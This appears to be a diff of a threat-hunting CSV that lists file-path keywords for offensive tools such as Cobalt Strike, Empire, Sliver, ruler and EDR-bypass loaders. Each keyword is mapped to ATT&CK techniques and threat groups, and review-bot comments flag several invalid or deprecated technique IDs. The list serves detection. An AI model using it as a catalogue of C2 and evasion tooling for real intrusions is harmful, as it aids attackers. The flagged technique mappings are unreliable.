T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","712","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" -"*/hop.php*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1098","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/HookDetector.exe*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/hooks/spoof.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 
- T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*/hop.php*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1098","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/horizon3ai/*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product 
","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*/hostenum.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*/hostmap-bfk.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -3812,7 +3831,7 @@
 "*/http-barracuda-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-bigip-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/http-c2.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z"
+"*/http-c2.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
 "*/http-cakephp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-chrono.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-cisco-anyconnect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
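Review bot: The technique column on the `*/http-c2.go*` row writes sub-techniques with a hyphen (`T1573-001`, `T1059-001`, `T1574-001`, `T1569-002`), while other rows in this file use the ATT&CK dot form (`T1059.001`), so a consumer that joins this column against ATT&CK IDs will not match these entries. The refresh leaves that column as it was and only updates the star, fork and updated_at fields. `T1573-003` through `T1573-005` also look suspect, since as far as I know T1573 defines only the .001 and .002 sub-techniques, so they should be checked against the current matrix rather than just re-punctuated. A corrected value would start `T1573.001 - T1573.002 - T1059.001 - T1059.003 - T1059.004 - ...`.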
@@ -3859,7 +3878,7 @@
 "*/http-lexmark-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z"
 "*/http-lfi.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z"
 "*/http-litespeed-sourcecode-download.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/HTTP-Login.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1109","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*/HTTP-Login.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1109","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
 "*/http-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-majordomo2-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-malware-host.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
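Review bot: The `*/HTTP-Login.ps1*` row ends its technique list with `T1109`, whereas the `*/hop.php*` row for the same Empire project, earlier in this diff, carries what appears to be an otherwise identical list ending in `T1098`. T1109 looks like a deprecated ATT&CK ID, so one of the two is probably a typo; aligning them keeps technique-based pivoting consistent across all Empire keywords. Separately, the groups field ends with a dangling separator (`Turla - `), which yields an empty group name when the field is split on ` - `; the Huan rows in the `@@ -3944` hunk have the same trailing separator in their tactics field (`TA0002 - TA0008 - `).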
@@ -3868,7 +3887,7 @@
 "*/http-method-tamper.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-mobileversion-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-nikto-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z"
-"*/http-ntlm/ntlmtransport*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
+"*/http-ntlm/ntlmtransport*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
 "*/http-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-open-redirect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
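Review bot: The `*/http-ntlm/ntlmtransport*` row maps ruler to `T1102.001 - T1201.001 - T1570.002`, and the last two do not look like valid ATT&CK IDs; to my knowledge neither T1201 nor T1570 defines sub-techniques. An analyst pivoting from a hit on this keyword to the technique would land on nothing, and any dashboard that aggregates by technique would silently drop the row. Since this file is refreshed mechanically, a validation step that checks every ID in `metadata_tool_techniques` against the published ATT&CK list would catch this class of error on each update.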
@@ -3932,7 +3951,7 @@
 "*/http-vuln-cve2017-5638.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-vuln-cve2017-5689.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-vuln-cve2017-8917.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/http-vulners-regex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","1","N/A","N/A","10","3002","526","2022-12-16T11:22:30Z","2017-12-19T21:21:28Z"
+"*/http-vulners-regex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","1","N/A","N/A","10","3003","527","2022-12-16T11:22:30Z","2017-12-19T21:21:28Z"
 "*/http-vuln-misfortune-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-vuln-wnr1000-creds.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/http-waf-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -3944,13 +3963,13 @@
 "*/http-xssed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/huan.exe *","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z"
 "*/HuanLoader/*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z"
-"*/HWSyscalls.cpp*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z"
+"*/HWSyscalls.cpp*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z"
 "*/hyperion.exe*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
 "*/Hypnos.git*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z"
 "*/hypobrychium.git*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z"
